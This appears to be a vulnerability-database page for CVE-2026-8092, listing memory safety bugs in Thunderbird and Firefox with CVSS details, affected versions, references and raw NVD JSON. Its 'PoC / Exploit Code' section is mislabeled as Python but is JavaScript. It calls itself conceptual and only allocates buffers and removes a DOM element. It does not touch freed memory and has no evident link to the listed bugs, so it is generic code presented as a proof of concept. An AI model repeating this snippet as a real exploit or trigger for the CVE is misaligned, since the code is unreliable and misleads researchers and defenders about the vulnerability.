CVE-2026-8092

Description

Memory safety bugs present in Thunderbird ESR 140.10.1 and Thunderbird 150.0.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE

Thunderbird ESR < 140.10.2

Thunderbird < 150.0.2

Firefox ESR < 140.10.2

Firefox ESR < 115.35.2

Firefox < 150.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-8092 (Conceptual)
 * This PoC demonstrates a potential trigger for memory corruption in vulnerable versions of Thunderbird.
 * It attempts to manipulate memory layout to cause a crash.
 */

function triggerVuln() {
    // Simulate memory allocation patterns that might lead to corruption
    let buffers = [];
    for (let i = 0; i < 1000; i++) {
        buffers.push(new Uint8Array(1024 * 1024)); // 1MB buffers
    }

    // Attempt to trigger use-after-free or overflow scenario
    // Actual exploit logic depends on specific bug details (UAF, Buffer Overflow, etc.)
    try {
        let obj = document.createElement('object');
        document.body.appendChild(obj);
        document.body.removeChild(obj);
        // Accessing the freed object reference
        if (obj) {
            console.log("Potential memory access on freed object");
        }
    } catch (e) {
        console.log("Error: " + e.message);
    }
}

triggerVuln();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8092
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8092
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8092/
[4] VulDB https://vuldb.com/cve/CVE-2026-8092
[5] https://bugzilla.mozilla.org/buglist.cgi?bug_id=1806249%2C2021977%2C2022576%2C2022722%2C2024439%2C2027883%2C2029463%2C2030323%2C2032042%2C2032043%2C2033270%2C2033637%2C2034422%2C2034496%2C2035879%2C2036516
[6] https://www.mozilla.org/security/advisories/mfsa2026-40/
[7] https://www.mozilla.org/security/advisories/mfsa2026-41/
[8] https://www.mozilla.org/security/advisories/mfsa2026-42/
[9] https://www.mozilla.org/security/advisories/mfsa2026-43/
[10] https://www.mozilla.org/security/advisories/mfsa2026-44/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8092", "sourceIdentifier": "[email protected]", "published": "2026-05-07T13:16:14.203", "lastModified": "2026-05-11T15:16:40.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Thunderbird ESR 140.10.1 and Thunderbird 150.0.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-416"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.35.2", "matchCriteriaId": "AF96A878-0508-42AF-A345-ACBC2FE28DD2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.10.2", "matchCriteriaId": "3BBAB7A3-2FBF-440E-88B4-8C6FB332F790"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionStartIncluding": "150.0", "versionEndExcluding": "150.0.2", "matchCriteriaId": "667A6A10-6C88-472B-9CF0-108744732F32"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.10.2", "matchCriteriaId": "239DA52B-4EB1-4294-9FBB-88F26B6C74F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionStartIncluding": "150.0", "versionEndExcluding": "150.0.2", "matchCriteriaId": "2279D441-7CD1-4BCB-8D17-B889225EA2E7"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1806249%2C2021977%2C2022576%2C2022722%2C2024439%2C2027883%2C2029463%2C2030323%2C2032042%2C2032043%2C2033270%2C2033637%2C2034422%2C2034496%2C2035879%2C2036516", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-40/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-41/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-42/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-43/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-44/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}